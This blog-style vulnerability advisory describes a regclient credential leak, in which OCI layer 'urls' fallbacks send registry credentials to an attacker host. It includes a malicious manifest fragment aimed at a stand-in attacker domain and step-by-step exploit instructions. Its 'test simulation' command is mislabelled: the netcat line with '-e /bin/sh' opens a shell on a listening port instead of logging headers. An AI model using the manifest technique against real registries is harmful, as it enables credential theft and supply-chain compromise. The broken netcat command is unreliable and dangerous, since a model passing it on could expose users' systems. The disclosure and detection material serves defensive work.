Listen to this Post
How the Vulnerability Works
regclient is a Go‑based Docker and OCI Registry client used for pulling, pushing, and copying container images. When fetching an image, regclient first requests the manifest from the registry, then downloads each blob (layer) from the same registry using the digest provided in the manifest.
The OCI image specification allows a layer descriptor to include a `urls` field – a list of alternate HTTP(S) locations where the blob can be retrieved. This feature is intended for “foreign” blobs that may be served from a content‑addressable store outside the registry.
The vulnerability arises when regclient encounters a layer descriptor with a `urls` field pointing to an attacker‑controlled host. If the primary blob request to the original registry fails (e.g., due to a network error or a 404 response), regclient automatically falls back to the URLs listed in the descriptor.
If the external server responds with an authentication challenge (e.g., HTTP 401 with a `WWW-Authenticate` header), regclient will re‑use the credentials that were originally configured for the original registry. These credentials are sent to the attacker‑controlled server, effectively leaking them.
The attack requires one of three prerequisites:
- A malicious registry that serves crafted manifests with attacker‑controlled
urls. - A malicious blob store that can intercept and redirect requests.
- A registry that does not enforce restrictions on external URLs for foreign blobs.
An example malicious manifest fragment:
{
"mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
"digest": "sha256:...",
"size": 1024,
"urls": ["https://malicious.example.org/blobs/sha256/..."]
}
When regclient fetches this image, the primary request to the legitimate registry fails, and it follows the attacker‑supplied URL. The attacker’s server then requests authentication, and regclient sends the original registry’s credentials – including usernames, passwords, or tokens – to the attacker.
This flaw was responsibly disclosed on 2026‑05‑25 and patched in regclient v0.11.5 on 2026‑05‑26.
DailyCVE Form
| Field | Value |
|–|–|
| Platform | regclient |
| Version | <= 0.11.4 |
| Vulnerability| Credential Leak |
| Severity | Medium |
| Date | 2026-05-25 |
| Prediction | 2026-05-26 (fixed) |
What Undercode Say
Analytics & Detection
To detect potential exploitation, monitor outgoing HTTP requests from regclient processes for unexpected destination domains and authentication headers.
Bash command to check for suspicious `urls` in manifests:
regctl manifest get <image> | jq '.layers[] | select(.urls != null) | {digest, urls}'
Audit regclient logs for failed blob requests followed by external redirects:
grep -E "blob request failed|fallback to URL" /var/log/regclient.log
Simulate the attack in a test environment (for validation only):
Start a malicious HTTP server that logs Authorization headers nc -l -p 8080 -e /bin/sh -c 'echo -e "HTTP/1.1 401 Unauthorized\r\nWWW-Authenticate: Basic realm=\"test\"\r\n\r\n"'
Then pull an image with a manifest containing `urls: [“http://localhost:8080/…”]` and observe if credentials are sent.
Exploit
An attacker with control over a registry or a blob store can:
1. Serve an OCI manifest with a layer descriptor that includes a `urls` field pointing to their own server.
2. Ensure the primary blob request to the legitimate registry fails (e.g., by returning a 404 or causing a timeout).
3. When regclient falls back to the attacker’s URL, the attacker’s server responds with a 401 challenge.
4. regclient automatically sends the original registry’s credentials to the attacker’s server, allowing the attacker to capture them.
The leaked credentials can then be used to authenticate to the original registry, granting the attacker read/write access to images, tags, and potentially other resources.
Protection
- Upgrade regclient to v0.11.5 or later – this release includes a fix that prevents sending authentication on redirects to external hosts.
- Restrict external URLs for foreign blobs at the registry level – configure the registry to reject manifests that contain `urls` fields pointing to untrusted domains.
- Use credential helpers or short‑lived tokens – limit the blast radius if credentials are leaked.
- Audit registry access logs for unusual pull patterns or failed blob requests that might indicate an attempted exploit.
Impact
- Confidentiality: Registry credentials (usernames, passwords, tokens) can be exfiltrated to an attacker‑controlled server.
- Integrity: With stolen credentials, an attacker can push malicious images, overwrite tags, or delete content from the registry.
- Availability: An attacker could disrupt services by deleting critical images or causing denial of service.
- Supply Chain: Compromised credentials may allow an attacker to inject backdoored images into CI/CD pipelines, affecting downstream consumers.
The vulnerability is rated Medium severity due to the prerequisite of a malicious registry or blob store, but the potential for credential theft and subsequent lateral movement makes it a significant risk for production environments.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
